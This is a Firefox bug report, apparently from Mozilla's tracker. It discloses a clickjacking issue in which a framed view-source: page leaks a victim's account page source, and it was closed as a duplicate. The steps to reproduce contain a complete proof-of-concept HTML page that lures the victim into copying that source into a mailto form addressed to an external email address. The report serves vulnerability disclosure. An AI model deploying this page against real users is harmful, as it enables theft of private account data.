Closed
Bug 953333
Opened 11 years ago
Closed 10 years ago
clickjacking source code
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 624883
People
(Reporter: akhilreni, Unassigned)
Details
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Steps to reproduce: <html> <body> <style> body { font-family: Arial; } #container{ position: relative; } #container2{ position: relative; } #iframe2 { width: 800px; height: 500px; position: relative; top: 0; left: 0; filter: alpha(opacity=50); opacity: 0.5; } </style> <div id="container"><form action="mailto:evilhawk08@gmail.com" method="POST" enctype="multipart/form-data" name="EmailTestForm"> copy paste here<br> <input type="text" name="VisitorName"><br><br> <input type="submit" value="Email This Form"> </form> </div> <div="container2"><h1>click down press ctrl+A and then copy it in the mail form above to recieve your code</h1><iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account"> </div> </body> </html> Actual results: hey there, the source code of xframe headers missing sites can be clickjacked. for example if a site has xframe headers missings, then an attacker can send a link to victim and can lure victim to copy the source code and send it to attacker. With this important things can be indeed revealed. <iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account"> Expected results: while in a chrome even if a site is vul to clickjacking the source code cannot be clickjacked. I think this is a browser and should be fixed . Hope you fix it soon :) happy christmas
Comment 1•10 years ago
|
||
The view-source problem is known and is being discussed. Marking as a duplicate of bug 624883.
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Updated•9 years ago
|
Group: core-security → core-security-release
Updated•8 years ago
|
Group: core-security-release
You need to log in
before you can comment on or make changes to this bug.
Description
•